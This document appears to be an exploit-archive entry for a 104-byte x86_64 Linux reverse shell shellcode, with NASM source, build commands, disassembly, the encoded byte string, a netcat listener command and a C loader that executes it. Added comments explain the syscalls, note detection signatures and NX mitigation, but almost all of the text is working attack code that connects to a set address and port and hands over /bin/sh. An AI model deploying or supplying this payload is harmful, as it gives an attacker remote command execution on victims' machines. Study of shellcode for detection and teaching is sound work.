###########################

# GNU/Linux x86_64 Reverse Shell Shellcode

###########################

/*
;Category: Shellcode
;Title: GNU/Linux x86_64 - Reverse Shell Shellcode
;Author: m4n3dw0lf
;Github: https://github.com/m4n3dw0lf
;Date: 18/07/2017
;Architecture: Linux x86_64
;Tested on: #1 SMP Debian 4.9.18-1 (2017-03-30) x86_64 GNU/Linux
 
##########
# Source #
##########
 
section .text
  global _start
    ; NASM / Intel syntax, Linux x86_64, raw syscalls (no libc).
    ; Sequence: socket(2) -> connect(2) to the hard-coded address below ->
    ; dup2(2) of the socket onto fds 0,1,2 -> execve("//bin/sh", NULL, NULL).
    ; This socket/connect/dup2x3/execve syscall chain, and the literal
    ; sockaddr bytes and "//bin/sh" string, are what seccomp/auditd/eBPF
    ; tracing and static scanners key on to recognise a reverse shell.
    ; The code never returns: the final execve replaces the process image,
    ; so the rbp frame set up at entry is never torn down.
    _start:
        push rbp
        mov rbp,rsp
        xor rdx, rdx                    ; protocol = 0
        push 1
        pop rsi                         ; type = 1 (SOCK_STREAM)
        push 2
        pop rdi                         ; domain = 2 (AF_INET)
        push 41
        pop rax ; sys_socket (41): socket(AF_INET, SOCK_STREAM, 0)
        syscall                         ; returns the new fd in rax; the value
                                        ; is never saved - fd 3 is assumed below
        sub rsp, 8                      ; 8 bytes for family/port/addr of a sockaddr_in
        mov dword [rsp], 0x5c110002 ; bytes 02 00 11 5c: sin_family = 2 (AF_INET), sin_port = 0x115c = 4444 in network byte order
        mov dword [rsp+4], 0x801a8c0 ; bytes c0 a8 01 08: sin_addr = 192.168.1.8 (little-endian dword of the big-endian address)
        lea rsi, [rsp]                  ; rsi = &sockaddr_in
        add rsp, 8                      ; rsp back to the saved-rbp slot
        pop rbx                         ; pops the saved rbp; the value is
        xor rbx, rbx                    ;   discarded immediately (rbx = 0)
                                        ; Net effect of the last three lines: rsp is now
                                        ; 16 bytes above the struct. The struct survives
                                        ; because every push/pop pair below reuses only
                                        ; the single slot directly above it.
        push 16
        pop rdx                         ; addrlen = 16 (sizeof sockaddr_in); bytes 8..15
                                        ; of that range are whatever the push/pop slot
                                        ; holds (sin_zero; presumably ignored by the kernel)
        push 3
        pop rdi                         ; sockfd = 3 (assumes 0,1,2 were the only open fds)
        push 42
        pop rax; sys_connect (42): connect(3, &sockaddr_in, 16)
        syscall                         ; rax = 0 on success, -errno on failure
        xor rsi, rsi                    ; rsi = 0: first target fd for dup2
    shell_loop:
        ; dup2(3, rsi) for rsi = 0, 1, 2 - stdin/stdout/stderr onto the socket.
        mov al, 33                      ; sys_dup2 (33); writes only the low byte of
                                        ; rax, so this relies on rax's upper bits
                                        ; being zero (connect returned 0, dup2 returns
                                        ; the small fd). NOTE(review): if connect failed
                                        ; rax still holds -errno and the syscall number
                                        ; would be garbage - the loop then does nothing
                                        ; useful and the shell below runs on the
                                        ; original fds.
        syscall
        inc rsi
        cmp rsi, 2
        jle shell_loop                  ; signed compare is fine for 0..2
        xor rax, rax                    ; clear rax fully before the mov al below
        xor rsi, rsi                    ; argv = NULL
        mov rdi, 0x68732f6e69622f2f     ; "//bin/sh" as a little-endian qword (bytes 2f 2f 62 69 6e 2f 73 68)
        push rsi                        ; 8 zero bytes: NUL terminator
        push rdi                        ; the 8 string bytes just below it
        mov rdi, rsp                    ; filename = "//bin/sh\0" on the stack
        xor rdx, rdx                    ; envp = NULL
        mov al, 59                      ; sys_execve (59): execve("//bin/sh", NULL, NULL)
        syscall                         ; does not return on success
 
#################################
# Compile and execute with NASM #
#################################
 
nasm -f elf64 reverse_tcp_shell.s -o reverse_tcp_shell.o
ld reverse_tcp_shell.o -o reverse_tcp_shell
 
#########################
# objdump --disassemble #
#########################
 
reverse_tcp_shell:     file format elf64-x86-64
 
 
Disassembly of section .text:
 
0000000000400080 <_start>:
  400080:   55                      push   %rbp
  400081:   48 89 e5                mov    %rsp,%rbp
  400084:   48 31 d2                xor    %rdx,%rdx
  400087:   6a 01                   pushq  $0x1
  400089:   5e                      pop    %rsi
  40008a:   6a 02                   pushq  $0x2
  40008c:   5f                      pop    %rdi
  40008d:   6a 29                   pushq  $0x29
  40008f:   58                      pop    %rax
  400090:   0f 05                   syscall 
  400092:   48 83 ec 08             sub    $0x8,%rsp
  400096:   c7 04 24 02 00 11 5c    movl   $0x5c110002,(%rsp)
  40009d:   c7 44 24 04 c0 a8 01    movl   $0x801a8c0,0x4(%rsp)
  4000a4:   08 
  4000a5:   48 8d 34 24             lea    (%rsp),%rsi
  4000a9:   48 83 c4 08             add    $0x8,%rsp
  4000ad:   5b                      pop    %rbx
  4000ae:   48 31 db                xor    %rbx,%rbx
  4000b1:   6a 10                   pushq  $0x10
  4000b3:   5a                      pop    %rdx
  4000b4:   6a 03                   pushq  $0x3
  4000b6:   5f                      pop    %rdi
  4000b7:   6a 2a                   pushq  $0x2a
  4000b9:   58                      pop    %rax
  4000ba:   0f 05                   syscall 
  4000bc:   48 31 f6                xor    %rsi,%rsi
 
00000000004000bf <shell_loop>:
  4000bf:   b0 21                   mov    $0x21,%al
  4000c1:   0f 05                   syscall 
  4000c3:   48 ff c6                inc    %rsi
  4000c6:   48 83 fe 02             cmp    $0x2,%rsi
  4000ca:   7e f3                   jle    4000bf <shell_loop>
  4000cc:   48 31 c0                xor    %rax,%rax
  4000cf:   48 31 f6                xor    %rsi,%rsi
  4000d2:   48 bf 2f 2f 62 69 6e    movabs $0x68732f6e69622f2f,%rdi
  4000d9:   2f 73 68 
  4000dc:   56                      push   %rsi
  4000dd:   57                      push   %rdi
  4000de:   48 89 e7                mov    %rsp,%rdi
  4000e1:   48 31 d2                xor    %rdx,%rdx
  4000e4:   b0 3b                   mov    $0x3b,%al
  4000e6:   0f 05                   syscall 
 
 
#######################
# 104 Bytes Shellcode #
#######################
 
for i in `objdump -d reverse_tcp_shell | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\x$i" ; done
 
\x55\x48\x89\xe5\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x83\xec\x08\xc7\x04\x24\x02\x00\x11\x5c\xc7\x44\x24\x04\xc0\xa8\x01\x08\x48\x8d\x34\x24\x48\x83\xc4\x08\x5b\x48\x31\xdb\x6a\x10\x5a\x6a\x03\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\xb0\x21\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\x7e\xf3\x48\x31\xc0\x48\x31\xf6\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x56\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05
 
########
# Test #
########
 
In the asm source:
  mov dword [rsp+4], 0x801a8c0 <IP Address (Little Endian) of the host that will receive the shell>
 
In the host that will receive the shell run:
  nc -vvlp 4444
 
On the target machine:
   compile with:
     gcc -fno-stack-protector -z execstack reverse_tcp_shell.c -o reverse_tcp_shell
   run:
     ./reverse_tcp_shell
 
 
 <!> gcc -fno-stack-protector -z execstack reverse_tcp_shell.c -o reverse_tcp_shell
*/
 
#include <stdio.h>
 
/* 104-byte payload: the same bytes as the objdump listing above.  The
 * sockaddr_in (02 00 11 5c c0 a8 01 08 = AF_INET, port 4444, 192.168.1.8)
 * and the "//bin/sh" string sit verbatim in the buffer, so this payload is
 * readily identified by static inspection (strings, signature scanning). */
unsigned char shellcode[] = "\x55\x48\x89\xe5\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x83\xec\x08\xc7\x04\x24\x02\x00\x11\x5c\xc7\x44\x24\x04\xc0\xa8\x01\x08\x48\x8d\x34\x24\x48\x83\xc4\x08\x5b\x48\x31\xdb\x6a\x10\x5a\x6a\x03\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\xb0\x21\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\x7e\xf3\x48\x31\xc0\x48\x31\xf6\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x56\x57\x48\x89\xe7\x48\x31\xd2\xb0\x3b\x0f\x05";
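/*
 * PoC loader: treats the bytes of shellcode[] as code and jumps to them.
 *
 * This only works when the data segment is executable (the build line above
 * uses -z execstack for that); with the default NX/W^X layout the indirect
 * call faults, which is the mitigation one expects in production binaries.
 * The original declared `main()` with an implicit int return type, which is
 * invalid since C99.  The payload normally never returns (its final execve
 * replaces the process image); `return 0` covers the case where it does.
 */
int main(void)
{
    int (*ret)(void) = (int (*)(void))shellcode;
    ret();
    return 0;
}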
